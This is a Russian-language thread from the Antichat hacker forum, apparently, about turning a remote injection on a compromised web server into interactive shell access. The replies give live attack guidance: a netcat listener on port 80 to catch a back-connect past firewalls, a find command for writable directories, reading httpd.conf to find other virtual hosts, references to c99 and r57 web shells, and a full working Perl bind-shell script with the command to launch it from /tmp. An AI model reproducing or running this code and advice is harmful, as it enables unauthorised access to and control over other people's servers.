Форум АНТИЧАТ - Проблема с шеллом

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Проблема с шеллом (https://forum.antichat.xyz/showthread.php?t=48249)

Проблема с шеллом

Есть ремоте инъекция, но папка которую можно читать только одна, запись соответственно в неё запрещена, разрешена только в /tmp, можно как-нибудь оттуда запустить bind script?

тебе лучше воспользоваться бэкконектом
rst и некоторые версии c99 шеллов запускают бэкконект из /tmp и если у тебя свободен 80 порт (не стоит на нем какойнить веб сервак), то в неткате лучше открывать именно его (nc -l -n -v -p 80) и соответственно бэкконект делать на этот порт, т.к. соединение сервера с другими портами может быть запрещено политикой безопасности...

ЗЫ да, имхо если включено safemode, то врядли чтото получится...

ЗЗЫ из шелла (если нет safemode и нет openbasedir) выполни команду

Код:

find / -type d -perm -2

мож всеже есть папки в которые ты можешь записывать...

найди httpd.conf и если прочитаешь, можешь увидеть пути к другим в.хостам

Конечно можно

Код:

#!/usr/bin/perl

$SHELL="/bin/bash -i";

if (@ARGV < 1) { exit("mda"); }

$LISTEN_PORT=$ARGV[0];

use Socket;

$protocol=getprotobyname('tcp');

socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";

setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);

bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";

listen(S,3) || die "Cant listen port\n";

while(1)

{

accept(CONN,S);

if(!($pid=fork))

{

die "Cannot fork" if (!defined $pid);

open STDIN,"<&CONN";

open STDOUT,">&CONN";

open STDERR,">&CONN";

exec $SHELL || die print CONN "Cant execute $SHELL\n";

close CONN;

exit 0;

}

}

cd /tmp; perl bind.pl 31337

или через через функции r57shell

Цитата:

как-нибудь оттуда запустить bind script

Если ты попробувал, и у тебя не получилось, скорее всего фаер порубал соедининие.